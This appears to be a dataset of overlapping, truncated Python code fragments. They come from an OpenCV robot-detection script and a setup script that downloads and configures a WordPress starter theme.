"hier, 1) return np.copy(filled) def get_large_contours(detect): # take a detection mask, and contour",
"np.all(ys > contour_range_border_limit) and np.all( ys < large_contour_image.shape[0] - contour_range_border_limit): contours_in_limits.append(contour) M =",
"contour_area_minimum = 2000 for c in contours: if cv2.contourArea(c) > contour_area_minimum: large_contours.append(c) return",
"1} robot_angles = [] contours_towards_center = [] contour_range_border_limit = 100 * objective_calibration_dict[objective] contours_in_limits",
"cv2 import numpy as np def detect(img): # finds and fills the located",
"np.ones((3, 3)) canny = np.copy(cv2.Canny(img, 20, 120)) dilated = cv2.dilate(canny, structure) contours, hier",
"contours, -1, 1, -1, 0, hier, 1) return np.copy(filled) def get_large_contours(detect): # take",
"2 + contour[:, 1] ** 2) val, bin_edges = np.histogram(theta, bins=50, range=[-np.pi, np.pi])",
"# check that our contours are within acceptable limits, draw their circle if",
"(cx, cy)) robot_angles.append(angle) return contours_towards_center, robot_angles def get_robot_control(img, objective): detected = detect(img) large_contours",
"3)) canny = np.copy(cv2.Canny(img, 20, 120)) dilated = cv2.dilate(canny, structure) contours, hier =",
"within acceptable limits, draw their circle if they are if np.all(xs > contour_range_border_limit)",
"2) val, bin_edges = np.histogram(theta, bins=50, range=[-np.pi, np.pi]) bin_centers = bin_edges[:-1] + np.diff(bin_edges)",
"get memory robot_control_mask = np.zeros(detect.shape) large_contour_image = cv2.drawContours(np.copy(robot_control_mask), large_contours, -1, 1, -1) #",
"cv2.findContours(detect, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE) large_contours = [] contour_area_minimum = 2000 for c in contours:",
"M[\"m00\"]) cy = int(M[\"m01\"] / M[\"m00\"]) contours_towards_center.append(contour) angle = get_robot_angle(contour, (cx, cy)) robot_angles.append(angle)",
"angle = get_robot_angle(contour, (cx, cy)) robot_angles.append(angle) return contours_towards_center, robot_angles def get_robot_control(img, objective): detected",
"# get memory robot_control_mask = np.zeros(detect.shape) large_contour_image = cv2.drawContours(np.copy(robot_control_mask), large_contours, -1, 1, -1)",
"= np.histogram(theta, bins=50, range=[-np.pi, np.pi]) bin_centers = bin_edges[:-1] + np.diff(bin_edges) / 2 return",
"bin_centers = bin_edges[:-1] + np.diff(bin_edges) / 2 return np.nanmean(np.where(val == 0, bin_centers, np.nan))",
"1] ** 2) val, bin_edges = np.histogram(theta, bins=50, range=[-np.pi, np.pi]) bin_centers = bin_edges[:-1]",
"hier = cv2.findContours(detect, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE) large_contours = [] contour_area_minimum = 2000 for c",
"for c in contours: if cv2.contourArea(c) > contour_area_minimum: large_contours.append(c) return large_contours def get_robot_angle(contour,",
"{'2x': 4, '4x': 2, '10x': 1, '20x': 1, '40x': 1} robot_angles = []",
"cy = int(M[\"m01\"] / M[\"m00\"]) contours_towards_center.append(contour) angle = get_robot_angle(contour, (cx, cy)) robot_angles.append(angle) return",
"contour_range_border_limit = 100 * objective_calibration_dict[objective] contours_in_limits = [] for contour in large_contours: xs",
"objective_calibration_dict[objective] contours_in_limits = [] for contour in large_contours: xs = np.squeeze(contour)[:, 0] ys",
"as np def detect(img): # finds and fills the located robots img =",
"large_contours def get_robot_angle(contour, center): contour = np.squeeze(np.copy(contour)) contour -= center theta = np.arctan2(contour[:,",
"detection mask, and contour information add circles contours, hier = cv2.findContours(detect, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)",
"2, '10x': 1, '20x': 1, '40x': 1} robot_angles = [] contours_towards_center = []",
"/ M[\"m00\"]) contours_towards_center.append(contour) angle = get_robot_angle(contour, (cx, cy)) robot_angles.append(angle) return contours_towards_center, robot_angles def",
"= cv2.findContours(dilated, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE) filled = cv2.drawContours(np.zeros(img.shape, dtype=np.uint8), contours, -1, 1, -1, 0,",
"get_large_contours(detect): # take a detection mask, and contour information add circles contours, hier",
"large_contour_image.shape[0] - contour_range_border_limit): if np.all(ys > contour_range_border_limit) and np.all( ys < large_contour_image.shape[0] -",
"= [] contour_range_border_limit = 100 * objective_calibration_dict[objective] contours_in_limits = [] for contour in",
"our contours are within acceptable limits, draw their circle if they are if",
"for contour in large_contours: xs = np.squeeze(contour)[:, 0] ys = np.squeeze(contour)[:, 1] #",
"= bin_edges[:-1] + np.diff(bin_edges) / 2 return np.nanmean(np.where(val == 0, bin_centers, np.nan)) def",
"robots img = cv2.convertScaleAbs(img, 1, 1.5) structure = np.ones((3, 3)) canny = np.copy(cv2.Canny(img,",
"they are if np.all(xs > contour_range_border_limit) and np.all( xs < large_contour_image.shape[0] - contour_range_border_limit):",
"np.squeeze(contour)[:, 0] ys = np.squeeze(contour)[:, 1] # check that our contours are within",
"- contour_range_border_limit): contours_in_limits.append(contour) M = cv2.moments(contour) cx = int(M[\"m10\"] / M[\"m00\"]) cy =",
"# take a detection mask, and contour information add circles contours, hier =",
"contour -= center theta = np.arctan2(contour[:, 1], contour[:, 0]) # rho = np.sqrt(contour[:,",
"are within acceptable limits, draw their circle if they are if np.all(xs >",
"1], contour[:, 0]) # rho = np.sqrt(contour[:, 0] ** 2 + contour[:, 1]",
"if they are if np.all(xs > contour_range_border_limit) and np.all( xs < large_contour_image.shape[0] -",
"+ np.diff(bin_edges) / 2 return np.nanmean(np.where(val == 0, bin_centers, np.nan)) def get_robots(large_contours, detect,",
"contours: if cv2.contourArea(c) > contour_area_minimum: large_contours.append(c) return large_contours def get_robot_angle(contour, center): contour =",
"dilated = cv2.dilate(canny, structure) contours, hier = cv2.findContours(dilated, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE) filled = cv2.drawContours(np.zeros(img.shape,",
"M[\"m00\"]) contours_towards_center.append(contour) angle = get_robot_angle(contour, (cx, cy)) robot_angles.append(angle) return contours_towards_center, robot_angles def get_robot_control(img,",
"finds and fills the located robots img = cv2.convertScaleAbs(img, 1, 1.5) structure =",
"large_contour_image.shape[0] - contour_range_border_limit): contours_in_limits.append(contour) M = cv2.moments(contour) cx = int(M[\"m10\"] / M[\"m00\"]) cy",
"center): contour = np.squeeze(np.copy(contour)) contour -= center theta = np.arctan2(contour[:, 1], contour[:, 0])",
"hier = cv2.findContours(dilated, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE) filled = cv2.drawContours(np.zeros(img.shape, dtype=np.uint8), contours, -1, 1, -1,",
"in contours: if cv2.contourArea(c) > contour_area_minimum: large_contours.append(c) return large_contours def get_robot_angle(contour, center): contour",
"np.nanmean(np.where(val == 0, bin_centers, np.nan)) def get_robots(large_contours, detect, objective): # get memory robot_control_mask",
"large_contours = [] contour_area_minimum = 2000 for c in contours: if cv2.contourArea(c) >",
"def get_robots(large_contours, detect, objective): # get memory robot_control_mask = np.zeros(detect.shape) large_contour_image = cv2.drawContours(np.copy(robot_control_mask),",
"rho = np.sqrt(contour[:, 0] ** 2 + contour[:, 1] ** 2) val, bin_edges",
"objective): # get memory robot_control_mask = np.zeros(detect.shape) large_contour_image = cv2.drawContours(np.copy(robot_control_mask), large_contours, -1, 1,",
"-1) # probably needs more adjustment in the future, so will make a",
"adjustment in the future, so will make a dict for now objective_calibration_dict =",
"np.all( xs < large_contour_image.shape[0] - contour_range_border_limit): if np.all(ys > contour_range_border_limit) and np.all( ys",
"120)) dilated = cv2.dilate(canny, structure) contours, hier = cv2.findContours(dilated, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE) filled =",
"= cv2.moments(contour) cx = int(M[\"m10\"] / M[\"m00\"]) cy = int(M[\"m01\"] / M[\"m00\"]) contours_towards_center.append(contour)",
"cv2.CHAIN_APPROX_SIMPLE) large_contours = [] contour_area_minimum = 2000 for c in contours: if cv2.contourArea(c)",
"acceptable limits, draw their circle if they are if np.all(xs > contour_range_border_limit) and",
"> contour_range_border_limit) and np.all( ys < large_contour_image.shape[0] - contour_range_border_limit): contours_in_limits.append(contour) M = cv2.moments(contour)",
"contour[:, 1] ** 2) val, bin_edges = np.histogram(theta, bins=50, range=[-np.pi, np.pi]) bin_centers =",
"contour_range_border_limit): contours_in_limits.append(contour) M = cv2.moments(contour) cx = int(M[\"m10\"] / M[\"m00\"]) cy = int(M[\"m01\"]",
"detect(img): # finds and fills the located robots img = cv2.convertScaleAbs(img, 1, 1.5)",
"the located robots img = cv2.convertScaleAbs(img, 1, 1.5) structure = np.ones((3, 3)) canny",
"add circles contours, hier = cv2.findContours(detect, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE) large_contours = [] contour_area_minimum =",
"if np.all(ys > contour_range_border_limit) and np.all( ys < large_contour_image.shape[0] - contour_range_border_limit): contours_in_limits.append(contour) M",
"< large_contour_image.shape[0] - contour_range_border_limit): contours_in_limits.append(contour) M = cv2.moments(contour) cx = int(M[\"m10\"] / M[\"m00\"])",
"= np.squeeze(contour)[:, 1] # check that our contours are within acceptable limits, draw",
"2000 for c in contours: if cv2.contourArea(c) > contour_area_minimum: large_contours.append(c) return large_contours def",
"bin_centers, np.nan)) def get_robots(large_contours, detect, objective): # get memory robot_control_mask = np.zeros(detect.shape) large_contour_image",
"return np.copy(filled) def get_large_contours(detect): # take a detection mask, and contour information add",
"check that our contours are within acceptable limits, draw their circle if they",
"their circle if they are if np.all(xs > contour_range_border_limit) and np.all( xs <",
"filled = cv2.drawContours(np.zeros(img.shape, dtype=np.uint8), contours, -1, 1, -1, 0, hier, 1) return np.copy(filled)",
"get_robot_control(img, objective): detected = detect(img) large_contours = get_large_contours(detected) robots, robot_angles = get_robots(large_contours, detected,",
"def get_robot_control(img, objective): detected = detect(img) large_contours = get_large_contours(detected) robots, robot_angles = get_robots(large_contours,",
"= np.zeros(detect.shape) large_contour_image = cv2.drawContours(np.copy(robot_control_mask), large_contours, -1, 1, -1) # probably needs more",
"a detection mask, and contour information add circles contours, hier = cv2.findContours(detect, cv2.RETR_TREE,",
"= np.squeeze(contour)[:, 0] ys = np.squeeze(contour)[:, 1] # check that our contours are",
"0] ** 2 + contour[:, 1] ** 2) val, bin_edges = np.histogram(theta, bins=50,",
"contours_towards_center = [] contour_range_border_limit = 100 * objective_calibration_dict[objective] contours_in_limits = [] for contour",
"= {'2x': 4, '4x': 2, '10x': 1, '20x': 1, '40x': 1} robot_angles =",
"-= center theta = np.arctan2(contour[:, 1], contour[:, 0]) # rho = np.sqrt(contour[:, 0]",
"0]) # rho = np.sqrt(contour[:, 0] ** 2 + contour[:, 1] ** 2)",
"100 * objective_calibration_dict[objective] contours_in_limits = [] for contour in large_contours: xs = np.squeeze(contour)[:,",
"= cv2.drawContours(np.zeros(img.shape, dtype=np.uint8), contours, -1, 1, -1, 0, hier, 1) return np.copy(filled) def",
"+ contour[:, 1] ** 2) val, bin_edges = np.histogram(theta, bins=50, range=[-np.pi, np.pi]) bin_centers",
"np.diff(bin_edges) / 2 return np.nanmean(np.where(val == 0, bin_centers, np.nan)) def get_robots(large_contours, detect, objective):",
"large_contours: xs = np.squeeze(contour)[:, 0] ys = np.squeeze(contour)[:, 1] # check that our",
"contour information add circles contours, hier = cv2.findContours(detect, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE) large_contours = []",
"np.all(xs > contour_range_border_limit) and np.all( xs < large_contour_image.shape[0] - contour_range_border_limit): if np.all(ys >",
"int(M[\"m01\"] / M[\"m00\"]) contours_towards_center.append(contour) angle = get_robot_angle(contour, (cx, cy)) robot_angles.append(angle) return contours_towards_center, robot_angles",
"contours_towards_center.append(contour) angle = get_robot_angle(contour, (cx, cy)) robot_angles.append(angle) return contours_towards_center, robot_angles def get_robot_control(img, objective):",
"def detect(img): # finds and fills the located robots img = cv2.convertScaleAbs(img, 1,",
"return large_contours def get_robot_angle(contour, center): contour = np.squeeze(np.copy(contour)) contour -= center theta =",
"get_robots(large_contours, detect, objective): # get memory robot_control_mask = np.zeros(detect.shape) large_contour_image = cv2.drawContours(np.copy(robot_control_mask), large_contours,",
"2 return np.nanmean(np.where(val == 0, bin_centers, np.nan)) def get_robots(large_contours, detect, objective): # get",
"limits, draw their circle if they are if np.all(xs > contour_range_border_limit) and np.all(",
"= 100 * objective_calibration_dict[objective] contours_in_limits = [] for contour in large_contours: xs =",
"'10x': 1, '20x': 1, '40x': 1} robot_angles = [] contours_towards_center = [] contour_range_border_limit",
"detect, objective): # get memory robot_control_mask = np.zeros(detect.shape) large_contour_image = cv2.drawContours(np.copy(robot_control_mask), large_contours, -1,",
"# probably needs more adjustment in the future, so will make a dict",
"a dict for now objective_calibration_dict = {'2x': 4, '4x': 2, '10x': 1, '20x':",
"1, '20x': 1, '40x': 1} robot_angles = [] contours_towards_center = [] contour_range_border_limit =",
"= detect(img) large_contours = get_large_contours(detected) robots, robot_angles = get_robots(large_contours, detected, objective) return robots,",
"cv2.drawContours(np.zeros(img.shape, dtype=np.uint8), contours, -1, 1, -1, 0, hier, 1) return np.copy(filled) def get_large_contours(detect):",
"1, -1) # probably needs more adjustment in the future, so will make",
"and contour information add circles contours, hier = cv2.findContours(detect, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE) large_contours =",
"contour = np.squeeze(np.copy(contour)) contour -= center theta = np.arctan2(contour[:, 1], contour[:, 0]) #"
] |
[
"__VERSION__) __github_url__ = 'https://github.com/JWKennington/CompPhys' from compphys.tests import run_tests # top level function for",
"import run_tests # top level function for running test suite, analogous to scipy.test()",
"'https://github.com/JWKennington/CompPhys' from compphys.tests import run_tests # top level function for running test suite,",
"__MINOR__, __MICRO__) __version__ = '.'.join(str(n) for n in __VERSION__) __github_url__ = 'https://github.com/JWKennington/CompPhys' from",
"__MICRO__) __version__ = '.'.join(str(n) for n in __VERSION__) __github_url__ = 'https://github.com/JWKennington/CompPhys' from compphys.tests",
"for n in __VERSION__) __github_url__ = 'https://github.com/JWKennington/CompPhys' from compphys.tests import run_tests # top",
"in __VERSION__) __github_url__ = 'https://github.com/JWKennington/CompPhys' from compphys.tests import run_tests # top level function",
"__VERSION__ = (__MAJOR__, __MINOR__, __MICRO__) __version__ = '.'.join(str(n) for n in __VERSION__) __github_url__",
"1 __VERSION__ = (__MAJOR__, __MINOR__, __MICRO__) __version__ = '.'.join(str(n) for n in __VERSION__)",
"0 __MINOR__ = 0 __MICRO__ = 1 __VERSION__ = (__MAJOR__, __MINOR__, __MICRO__) __version__",
"= 1 __VERSION__ = (__MAJOR__, __MINOR__, __MICRO__) __version__ = '.'.join(str(n) for n in",
"(__MAJOR__, __MINOR__, __MICRO__) __version__ = '.'.join(str(n) for n in __VERSION__) __github_url__ = 'https://github.com/JWKennington/CompPhys'",
"compphys.tests import run_tests # top level function for running test suite, analogous to",
"= 0 __MICRO__ = 1 __VERSION__ = (__MAJOR__, __MINOR__, __MICRO__) __version__ = '.'.join(str(n)",
"__version__ = '.'.join(str(n) for n in __VERSION__) __github_url__ = 'https://github.com/JWKennington/CompPhys' from compphys.tests import",
"n in __VERSION__) __github_url__ = 'https://github.com/JWKennington/CompPhys' from compphys.tests import run_tests # top level",
"'.'.join(str(n) for n in __VERSION__) __github_url__ = 'https://github.com/JWKennington/CompPhys' from compphys.tests import run_tests #",
"\"\"\"Package-level information\"\"\" __MAJOR__ = 0 __MINOR__ = 0 __MICRO__ = 1 __VERSION__ =",
"__MINOR__ = 0 __MICRO__ = 1 __VERSION__ = (__MAJOR__, __MINOR__, __MICRO__) __version__ =",
"0 __MICRO__ = 1 __VERSION__ = (__MAJOR__, __MINOR__, __MICRO__) __version__ = '.'.join(str(n) for",
"__MAJOR__ = 0 __MINOR__ = 0 __MICRO__ = 1 __VERSION__ = (__MAJOR__, __MINOR__,",
"information\"\"\" __MAJOR__ = 0 __MINOR__ = 0 __MICRO__ = 1 __VERSION__ = (__MAJOR__,",
"from compphys.tests import run_tests # top level function for running test suite, analogous",
"= (__MAJOR__, __MINOR__, __MICRO__) __version__ = '.'.join(str(n) for n in __VERSION__) __github_url__ =",
"= '.'.join(str(n) for n in __VERSION__) __github_url__ = 'https://github.com/JWKennington/CompPhys' from compphys.tests import run_tests",
"__github_url__ = 'https://github.com/JWKennington/CompPhys' from compphys.tests import run_tests # top level function for running",
"__MICRO__ = 1 __VERSION__ = (__MAJOR__, __MINOR__, __MICRO__) __version__ = '.'.join(str(n) for n",
"= 0 __MINOR__ = 0 __MICRO__ = 1 __VERSION__ = (__MAJOR__, __MINOR__, __MICRO__)",
"= 'https://github.com/JWKennington/CompPhys' from compphys.tests import run_tests # top level function for running test"
] |
[
"python # -*- coding: utf-8 -*- \"\"\" err.py Redlight errors \"\"\" __author__ =",
"errors \"\"\" __author__ = '<NAME> <<EMAIL>>' __copyright__ = 'Copyright 2012 Vanderbilt University. All",
"-*- \"\"\" err.py Redlight errors \"\"\" __author__ = '<NAME> <<EMAIL>>' __copyright__ = 'Copyright",
"utf-8 -*- \"\"\" err.py Redlight errors \"\"\" __author__ = '<NAME> <<EMAIL>>' __copyright__ =",
"\"\"\" err.py Redlight errors \"\"\" __author__ = '<NAME> <<EMAIL>>' __copyright__ = 'Copyright 2012",
"<<EMAIL>>' __copyright__ = 'Copyright 2012 Vanderbilt University. All Rights Reserved' class RedlightError(Exception): pass",
"__author__ = '<NAME> <<EMAIL>>' __copyright__ = 'Copyright 2012 Vanderbilt University. All Rights Reserved'",
"err.py Redlight errors \"\"\" __author__ = '<NAME> <<EMAIL>>' __copyright__ = 'Copyright 2012 Vanderbilt",
"= '<NAME> <<EMAIL>>' __copyright__ = 'Copyright 2012 Vanderbilt University. All Rights Reserved' class",
"-*- coding: utf-8 -*- \"\"\" err.py Redlight errors \"\"\" __author__ = '<NAME> <<EMAIL>>'",
"# -*- coding: utf-8 -*- \"\"\" err.py Redlight errors \"\"\" __author__ = '<NAME>",
"\"\"\" __author__ = '<NAME> <<EMAIL>>' __copyright__ = 'Copyright 2012 Vanderbilt University. All Rights",
"'<NAME> <<EMAIL>>' __copyright__ = 'Copyright 2012 Vanderbilt University. All Rights Reserved' class RedlightError(Exception):",
"coding: utf-8 -*- \"\"\" err.py Redlight errors \"\"\" __author__ = '<NAME> <<EMAIL>>' __copyright__",
"Redlight errors \"\"\" __author__ = '<NAME> <<EMAIL>>' __copyright__ = 'Copyright 2012 Vanderbilt University.",
"#!/usr/bin/env python # -*- coding: utf-8 -*- \"\"\" err.py Redlight errors \"\"\" __author__"
] |
[
"parser.add_argument('-u', '--update', action='store_true', dest='update', default=False, help=\"Check for updates to the harbor script\") parser.add_argument('-i',",
"theme and development environment setup by Infinity Marketing that is heavily based on",
"update \" + name) print(\"\") print(\"Done!\") # Downloads the starter theme _s from",
"os.system(\"bower update \" + name) print(\"\") print(\"Done!\") # Downloads the starter theme _s",
"Harbor theme to or if -u option is present updates the Harbor based",
"\") slug = name.lower().replace(' ', '-') funcSlug = name.lower().replace(' ', '_') desc =",
"available\\)\") nameRe = re.compile(\"[a-z]+-*[a-z]*#\") #print(update_avail.findall(\"├─┬ breakpoint-sass#2.5.0 \")) #exit(0) with open(\"updates.tmp\", \"r\") as update_file:",
"dest='update', default=False, help=\"Check for updates to the harbor script\") parser.add_argument('-i', '--install', action='store_true', dest='install',",
"glob import subprocess import platform import sys, getopt import argparse import re def",
"nameMatch.group()[:-1] ans = input(\"Update module?(Y/n)\") while ans != \"\" and ans.lower()[0] != 'y'",
"platform import sys, getopt import argparse import re def main(): parser = argparse.ArgumentParser()",
"bower\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(\"Done!\") gulp = subprocess.run(cmd+ \" gulp\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)",
"\" npm\", shell=True) if npm.returncode == 1: print(\"NodeJs is not installed. Aborting\") return",
"print(\"Up to date!\") else: parser.print_usage() def updateTheme(directory): os.chdir(directory) print(\"Updating theme...\") os.system(\"bower list >",
"setup_dir is not None: os.chdir(setup_dir) if platform.system() != \"Windows\": if os.getuid() != 0:",
"Marketing that is heavily based on Automattic's Underscores theme.\", \"Description: \" + desc))",
"= requests.get(\"https://github.com/Infinity-Marketing/Harbor/archive/sass-restructure.zip\") if file.status_code != 200: print(\"Error: There was a problem while downloading",
"== 'y'): print(\"updating\", name, sep=\" \") os.system(\"bower update \" + name) print(\"\") print(\"Done!\")",
"\" + slug)) headerInfo.append((\"Theme Name: Harbor\", \"Theme Name: \" + name)) headerInfo.append((\"Description: Harbor",
"= update_avail.findall(line) if results != []: print(line) nameMatch = nameRe.search(line) name = nameMatch.group()[:-1]",
"end=' ') subprocess.run(\"npm install -g gulp\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(\"Done!\") print(\"Installing dependancies...\") subprocess.run(\"bower",
"parser.parse_args() install = results.install update = results.update setup_dir = results.dir if(install): if setup_dir",
"== 1: print(\"Bower is not installed.\") print(\"Installing bower...\") subprocess.run(\"npm install -g bower\", shell=True,",
"directory to install Harbor theme to or if -u option is present updates",
"slug + \"/*.php\") for filename in glob.glob(\"./\" + slug + \"/*/*.php\"): files.append(filename) strings",
"dest='install', default=False, help=\"Install harbor theme in current directory\") parser.add_argument('-d', '--directory', action='store', dest='dir', help=\"Specify",
"theme: \") print(\"Setting up Theme...\", end=' ') os.rename(\"./Harbor-sass-restructure\", \"./\" + slug) files =",
"for filename in files: file = open(filename, \"r\") filedata = file.read() file.close() for",
"file: file.extractall(\".\") print(\"Done!\") return True def setupTheme(): name = input(\"Enter a name for",
"a directory to install Harbor theme to or if -u option is present",
"Domain: \" + slug)) headerInfo.append((\"Theme Name: Harbor\", \"Theme Name: \" + name)) headerInfo.append((\"Description:",
"not installed. Aborting\") return bower = subprocess.run(cmd+ \" bower\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if",
"\")) #exit(0) with open(\"updates.tmp\", \"r\") as update_file: for line in update_file: results =",
"update_avail.findall(line) if results != []: print(line) nameMatch = nameRe.search(line) name = nameMatch.group()[:-1] ans",
"\"Theme Name: \" + name)) headerInfo.append((\"Description: Harbor is a starter theme and development",
"input(\"Enter a name for the theme: \") slug = name.lower().replace(' ', '-') funcSlug",
"setupEnvironment(slug): cmd = \"where\" if platform.system() == \"Windows\" else \"which\" npm = subprocess.run(cmd+",
"Aug 3 14:20:50 2017 @author: <NAME> \"\"\" import zipfile import os import requests",
"None: updateTheme(setup_dir) else: print(\"Checking for updates to Harbor script...\") print(\"Up to date!\") else:",
"content.write(file.content) print(\"Done!\") print(\"Extracting files...\", end=' ') with zipfile.ZipFile(\"sass-restructure.zip\", \"r\") as file: file.extractall(\".\") print(\"Done!\")",
"', '_') desc = input(\"Enter a short description for the theme: \") print(\"Setting",
"= argparse.ArgumentParser() parser.add_argument('-u', '--update', action='store_true', dest='update', default=False, help=\"Check for updates to the harbor",
"results.dir if(install): if setup_dir is not None: os.chdir(setup_dir) if platform.system() != \"Windows\": if",
"subprocess.run(cmd+ \" npm\", shell=True) if npm.returncode == 1: print(\"NodeJs is not installed. Aborting\")",
"stderr=subprocess.PIPE) if bower.returncode == 1: print(\"Bower is not installed.\") print(\"Installing bower...\") subprocess.run(\"npm install",
"gulp.returncode == 1: print(\"Gulp is not installed\") print(\"Installing Gulp...\", end=' ') subprocess.run(\"npm install",
"description for the theme: \") print(\"Setting up Theme...\", end=' ') os.rename(\"./Harbor-sass-restructure\", \"./\" +",
"= subprocess.run(cmd+ \" npm\", shell=True) if npm.returncode == 1: print(\"NodeJs is not installed.",
"+ name) print(\"\") print(\"Done!\") # Downloads the starter theme _s from github def",
"install -g bower\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(\"Done!\") gulp = subprocess.run(cmd+ \" gulp\", shell=True,",
"= input(\"Update module?(Y/n)\") if(ans == \"\" or ans.lower()[0] == 'y'): print(\"updating\", name, sep=\"",
"+ \"_\")) strings.append((\" <code> Harbor</code>\", \" <code> \" + name.replace(' ', '_') + \"</code>\")) strings.append((\"Harbor-\",",
"!= 'y' and ans.lower()[0] != 'n': ans = input(\"Update module?(Y/n)\") if(ans == \"\"",
"option is present updates the Harbor based theme in that directory\") plat =",
"as file: file.extractall(\".\") print(\"Done!\") return True def setupTheme(): name = input(\"Enter a name",
"and development environment setup by Infinity Marketing that is heavily based on Automattic's",
"is not installed. Aborting\") return bower = subprocess.run(cmd+ \" bower\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)",
"= subprocess.run(cmd+ \" gulp\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if gulp.returncode == 1: print(\"Gulp is",
"slug + \"/*/*.php\"): files.append(filename) strings = [] strings.append((\"'harbor'\", \"'\" + slug + \"'\"))",
"'y' and ans.lower()[0] != 'n': ans = input(\"Update module?(Y/n)\") if(ans == \"\" or",
"os.rename(\"./Harbor-sass-restructure\", \"./\" + slug) files = glob.glob(\"./\" + slug + \"/*.php\") for filename",
"with open(\"updates.tmp\", \"r\") as update_file: for line in update_file: results = update_avail.findall(line) if",
"end=' ') os.rename(\"./Harbor-sass-restructure\", \"./\" + slug) files = glob.glob(\"./\" + slug + \"/*.php\")",
"the files.\\n\\tAborting. \") return False with open(\"sass-restructure.zip\", \"wb\") as content: content.write(file.content) print(\"Done!\") print(\"Extracting",
"<code> \" + name.replace(' ', '_') + \"</code>\")) strings.append((\"Harbor-\", slug + \"-\")) findInFiles(strings, files)",
"stdout=subprocess.PIPE, stderr=subprocess.PIPE) print(\"Done!\") gulp = subprocess.run(cmd+ \" gulp\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if gulp.returncode",
"= file.read() file.close() for change in strings: filedata = filedata.replace(change[0], change[1]) file =",
"-*- coding: utf-8 -*- \"\"\" Created on Thu Aug 3 14:20:50 2017 @author:",
"\"./\" + slug + \"/sass/style.scss\"]) print('Done!') return slug def findInFiles(strings, files): for filename",
"\"/style.css\", \"./\" + slug + \"/sass/style.scss\"]) print('Done!') return slug def findInFiles(strings, files): for",
"= open(filename, \"r\") filedata = file.read() file.close() for change in strings: filedata =",
"harbor\", \"Text Domain: \" + slug)) headerInfo.append((\"Theme Name: Harbor\", \"Theme Name: \" +",
"headerInfo.append((\"Description: Harbor is a starter theme and development environment setup by Infinity Marketing",
"= re.compile(\"[a-z]+-*[a-z]*#\") #print(update_avail.findall(\"├─┬ breakpoint-sass#2.5.0 \")) #exit(0) with open(\"updates.tmp\", \"r\") as update_file: for line",
"updateTheme(directory): os.chdir(directory) print(\"Updating theme...\") os.system(\"bower list > updates.tmp\") update_avail = re.compile(\"\\(([0-9]\\.)*[0-9] available\\)\") nameRe",
"stderr=subprocess.PIPE) if gulp.returncode == 1: print(\"Gulp is not installed\") print(\"Installing Gulp...\", end=' ')",
"ans.lower()[0] != 'y' and ans.lower()[0] != 'n': ans = input(\"Update module?(Y/n)\") if(ans ==",
"+ \"/*/*.php\"): files.append(filename) strings = [] strings.append((\"'harbor'\", \"'\" + slug + \"'\")) strings.append((\"harbor_\",",
"updateTheme(setup_dir) else: print(\"Checking for updates to Harbor script...\") print(\"Up to date!\") else: parser.print_usage()",
"\"'\")) strings.append((\"harbor_\", funcSlug + \"_\")) strings.append((\" <code> Harbor</code>\", \" <code> \" + name.replace(' ', '_')",
"'_') desc = input(\"Enter a short description for the theme: \") print(\"Setting up",
"theme in current directory\") parser.add_argument('-d', '--directory', action='store', dest='dir', help=\"Specify a directory to install",
"+ desc)) findInFiles(headerInfo, [\"./\" + slug + \"/style.css\", \"./\" + slug + \"/sass/style.scss\"])",
"script as root\") print(\"Example: 'sudo python3 setup.py'\") return #download theme zip if fetchArchive()",
"print(\"Downloading Theme files...\", end=' ') file = requests.get(\"https://github.com/Infinity-Marketing/Harbor/archive/sass-restructure.zip\") if file.status_code != 200: print(\"Error:",
"\" bower\", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) if bower.returncode == 1: print(\"Bower is not installed.\")",
"False with open(\"sass-restructure.zip\", \"wb\") as content: content.write(file.content) print(\"Done!\") print(\"Extracting files...\", end=' ') with",
"print(\"Installing dependancies...\") subprocess.run(\"bower install\", shell=True, cwd=\"./\"+slug) subprocess.run(\"npm install\", shell=True, cwd=\"./\"+slug) print(\"Done!\") if(__name__ ==",
"results = update_avail.findall(line) if results != []: print(line) nameMatch = nameRe.search(line) name =",
"zipfile import os import requests import glob import subprocess import platform import sys,",
"is not installed\") print(\"Installing Gulp...\", end=' ') subprocess.run(\"npm install -g gulp\", shell=True, stdout=subprocess.PIPE,",
"or if -u option is present updates the Harbor based theme in that",
"\"Windows\" else \"which\" npm = subprocess.run(cmd+ \" npm\", shell=True) if npm.returncode == 1:",
"in current directory\") parser.add_argument('-d', '--directory', action='store', dest='dir', help=\"Specify a directory to install Harbor",
"for line in update_file: results = update_avail.findall(line) if results != []: print(line) nameMatch",
"+ slug) files = glob.glob(\"./\" + slug + \"/*.php\") for filename in glob.glob(\"./\"",
"list > updates.tmp\") update_avail = re.compile(\"\\(([0-9]\\.)*[0-9] available\\)\") nameRe = re.compile(\"[a-z]+-*[a-z]*#\") #print(update_avail.findall(\"├─┬ breakpoint-sass#2.5.0 \"))",
"\"wb\") as content: content.write(file.content) print(\"Done!\") print(\"Extracting files...\", end=' ') with zipfile.ZipFile(\"sass-restructure.zip\", \"r\") as",
"bower.returncode == 1: print(\"Bower is not installed.\") print(\"Installing bower...\") subprocess.run(\"npm install -g bower\",",
"parser.print_usage() def updateTheme(directory): os.chdir(directory) print(\"Updating theme...\") os.system(\"bower list > updates.tmp\") update_avail = re.compile(\"\\(([0-9]\\.)*[0-9]",
"= setupTheme() setupEnvironment(slug) elif update: if setup_dir is not None: updateTheme(setup_dir) else: print(\"Checking",
"for filename in glob.glob(\"./\" + slug + \"/*/*.php\"): files.append(filename) strings = [] strings.append((\"'harbor'\",",
